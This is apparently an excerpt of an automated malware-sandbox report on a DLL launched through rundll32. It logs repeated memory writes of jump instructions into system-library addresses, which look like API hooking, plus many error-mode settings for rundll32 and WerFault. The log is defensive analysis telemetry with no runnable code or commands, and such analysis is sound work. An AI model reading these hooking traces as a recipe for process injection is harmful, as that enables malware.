Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 32C0005 value: E9 2B BA 37 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 7763BA30 value: E9 DA 45 C8 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 32D0008 value: E9 8B 8E 3B 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 77688E90 value: E9 80 71 C4 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 32F0005 value: E9 8B 4D D7 73 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 77064D90 value: E9 7A B2 28 8C Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 3300005 value: E9 EB EB D7 73 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 7707EBF0 value: E9 1A 14 28 8C Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 3310005 value: E9 8B 8A 2B 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 755C8A90 value: E9 7A 75 D4 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 3320005 value: E9 2B 02 2D 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 755F0230 value: E9 DA FD D2 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4920005 value: E9 8B 2F D5 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 77672F90 value: E9 7A D0 2A 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4930005 value: E9 2B BA D0 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 7763BA30 value: E9 DA 45 2F 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4940008 value: E9 8B 8E D4 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 77688E90 value: E9 80 71 2B 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4960005 value: E9 8B 4D 70 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 77064D90 value: E9 7A B2 8F 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4970005 value: E9 EB EB 70 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 7707EBF0 value: E9 1A 14 8F 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4980005 value: E9 8B 8A C4 70 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 755C8A90 value: E9 7A 75 3B 8F Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 4990005 value: E9 2B 02 C6 70 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1436 base: 755F0230 value: E9 DA FD 39 8F Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 2F90005 value: E9 8B 2F 6E 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 77672F90 value: E9 7A D0 91 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 2FA0005 value: E9 2B BA 69 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 7763BA30 value: E9 DA 45 96 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 47A0008 value: E9 8B 8E EE 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 77688E90 value: E9 80 71 11 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 47C0005 value: E9 8B 4D 8A 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 77064D90 value: E9 7A B2 75 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 47D0005 value: E9 EB EB 8A 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 7707EBF0 value: E9 1A 14 75 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 47E0005 value: E9 8B 8A DE 70
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 755C8A90 value: E9 7A 75 21 8F
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 47F0005 value: E9 2B 02 E0 70
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 1224 base: 755F0230 value: E9 DA FD 1F 8F
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 2CD0005 value: E9 8B 2F 9A 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 77672F90 value: E9 7A D0 65 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 4490005 value: E9 2B BA 1A 73
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 7763BA30 value: E9 DA 45 E5 8C
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 44A0008 value: E9 8B 8E 1E 73
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 77688E90 value: E9 80 71 E1 8C
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 44D0005 value: E9 8B 4D B9 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 77064D90 value: E9 7A B2 46 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 44E0005 value: E9 EB EB B9 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 7707EBF0 value: E9 1A 14 46 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 44F0005 value: E9 8B 8A 0D 71
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 755C8A90 value: E9 7A 75 F2 8E
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 4500005 value: E9 2B 02 0F 71
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 736 base: 755F0230 value: E9 DA FD F0 8E
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 2690005 value: E9 8B 2F FE 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 77672F90 value: E9 7A D0 01 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 26A0005 value: E9 2B BA F9 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 7763BA30 value: E9 DA 45 06 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 2700008 value: E9 8B 8E F8 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 77688E90 value: E9 80 71 07 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 4000005 value: E9 8B 4D 06 73
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 77064D90 value: E9 7A B2 F9 8C
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 4010005 value: E9 EB EB 06 73
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 7707EBF0 value: E9 1A 14 F9 8C
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 4020005 value: E9 8B 8A 5A 71
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 755C8A90 value: E9 7A 75 A5 8E
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 4030005 value: E9 2B 02 5C 71
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6748 base: 755F0230 value: E9 DA FD A3 8E
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 28F0005 value: E9 8B 2F D8 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 77672F90 value: E9 7A D0 27 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 2900005 value: E9 2B BA D3 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 7763BA30 value: E9 DA 45 2C 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 2910008 value: E9 8B 8E D7 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 77688E90 value: E9 80 71 28 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 2980005 value: E9 8B 4D 6E 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 77064D90 value: E9 7A B2 91 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 2990005 value: E9 EB EB 6E 74
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 7707EBF0 value: E9 1A 14 91 8B
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 29A0005 value: E9 8B 8A C2 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 755C8A90 value: E9 7A 75 3D 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 2B50005 value: E9 2B 02 AA 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 6196 base: 755F0230 value: E9 DA FD 55 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4A40005 value: E9 8B 2F C3 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 77672F90 value: E9 7A D0 3C 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4A50005 value: E9 2B BA BE 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 7763BA30 value: E9 DA 45 41 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4A60008 value: E9 8B 8E C2 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 77688E90 value: E9 80 71 3D 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4A80005 value: E9 8B 4D 5E 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 77064D90 value: E9 7A B2 A1 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4A90005 value: E9 EB EB 5E 72
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 7707EBF0 value: E9 1A 14 A1 8D
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4AA0005 value: E9 8B 8A B2 70
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 755C8A90 value: E9 7A 75 4D 8F
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 4AB0005 value: E9 2B 02 B4 70
Source: C:\Windows\SysWOW64\rundll32.exe; Memory written: PID: 7824 base: 755F0230 value: E9 DA FD 4B 8F
Source: C:\Windows\System32\loaddll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
